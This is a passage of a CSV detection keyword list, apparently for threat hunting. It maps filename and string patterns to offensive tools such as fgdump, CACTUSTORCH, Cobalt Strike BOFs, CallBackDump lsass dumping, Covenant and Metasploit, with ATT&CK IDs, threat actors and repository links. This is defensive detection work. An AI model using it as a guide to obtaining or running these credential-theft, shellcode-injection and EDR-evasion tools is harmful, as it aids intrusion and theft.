T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*cachedump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cachedump64.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*CACTUSTORCH*","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.cna*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.cs*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.hta*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.js*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.vba*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.vbe*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.vbs*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*caffix*amass*","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*caffix/amass*","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*calebstewart/pwncat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*-CalendarNTLMLeak*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" +"*CALLBACK_HASHDUMP*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CALLBACK_KEYSTROKES*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CALLBACK_NETVIEW*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CALLBACK_PORTSCAN*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CALLBACK_TOKEN_STOLEN*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CallBackDump*dumpXor*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*CallbackDump.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*can_flood_frames*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*CandyPotato.exe *","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","0","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*canix1/ADACLScanner*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*Cannot enumerate antivirus*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*capcom_sys_exec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*capcom_sys_exec.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*CaptainNox/Hypnos*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*captcha-killer.*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*CapturedCredential.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedCredential.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedHashCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedPasswordCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedTicketCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*capturetokenphish.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - 